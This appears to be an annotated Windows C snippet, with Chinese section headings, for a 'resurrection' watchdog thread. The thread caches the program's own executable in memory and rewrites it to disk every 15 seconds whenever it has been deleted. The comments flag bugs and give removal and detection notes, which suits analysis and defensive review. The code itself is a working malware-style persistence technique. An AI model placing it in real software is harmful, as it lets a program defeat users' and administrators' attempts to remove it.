代码
// ShieldThread: self-restoration ("resurrection") watchdog.
// Reads the process's own executable image into memory once, then polls every
// 15 seconds; when the file is no longer found at its original path, it writes
// the in-memory copy back to that path.
// Returns 0, but the polling loop has no exit, so the return is not reached in
// normal flow.
// Response note: the restore copy lives in this process's memory (Mem), so
// removing the file only lasts if the process hosting this thread is stopped.
// Observable behaviour: a process re-creating a file at its own image path
// (CREATE_ALWAYS followed by a full-size write) on a fixed 15 s polling period.
// NOTE(review): declared with no parameter, whereas a thread start routine
// takes one LPVOID argument.
DWORD WINAPI ShieldThread()
{
char FilePath[MAX_PATH];
HANDLE hFile;
HANDLE hSearch;
void* Mem;
int Size;
DWORD BytesRead;
WIN32_FIND_DATA FileData;
// NOTE(review): ProtectKey1/ProtectKey2 are never used in this function.
char ProtectKey1[MAX_PATH*2],ProtectKey2[MAX_PATH*2];
__try
{
// NOTE(review): none of the API return values below are checked.
GetModuleFileNameA(NULL,FilePath,MAX_PATH); // get the path of the current executable
hFile =CreateFileA(FilePath,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); // open own image file for reading
// NOTE(review): GetFileSize returns a DWORD (INVALID_FILE_SIZE on failure); it is stored in a signed int here.
Size =GetFileSize(hFile,0); // get own file size
// NOTE(review): this buffer is never released; no VirtualFree call appears in the function.
Mem =VirtualAlloc(0,Size,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE); // allocate a buffer the size of the file
ReadFile(hFile,Mem,Size,&BytesRead,0); // read the whole image into the buffer
CloseHandle(hFile); // close the file handle
while(1)
{
// NOTE(review): FindFirstFile is the TCHAR macro while FilePath is char and the other
// calls use the explicit ...A variants; presumably this is built as ANSI. Confirm.
hSearch =FindFirstFile(FilePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE) // file not found at its path: treated as "deleted or removed"
{
hFile=CreateFileA(FilePath,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); // re-create the file at the original path
WriteFile(hFile,Mem,Size,&BytesRead,0); // write the saved image back (BytesRead reused as the written count)
CloseHandle(hFile); // close the file handle
// restoration complete
}
// NOTE(review): also reached when hSearch is INVALID_HANDLE_VALUE, i.e. on the restore path.
FindClose(hSearch);
Sleep(15000); // polling period: 15 seconds
}
}
__finally
{
// NOTE(review): hFile and hSearch have already been closed inside the __try block
// by the time control can reach here, so both calls act on stale handles.
CloseHandle(hFile);
FindClose(hSearch);
}
return 0;
}
调用
// Starts ShieldThread on a new thread with default security attributes, default
// stack size, no argument, and no creation flags.
// NOTE(review): the LPTHREAD_START_ROUTINE cast hides that ShieldThread is declared
// without the LPVOID parameter; the returned thread handle is discarded, so it is
// never closed and creation failure goes unnoticed.
CreateThread(0,0,(LPTHREAD_START_ROUTINE)ShieldThread,0,0,0);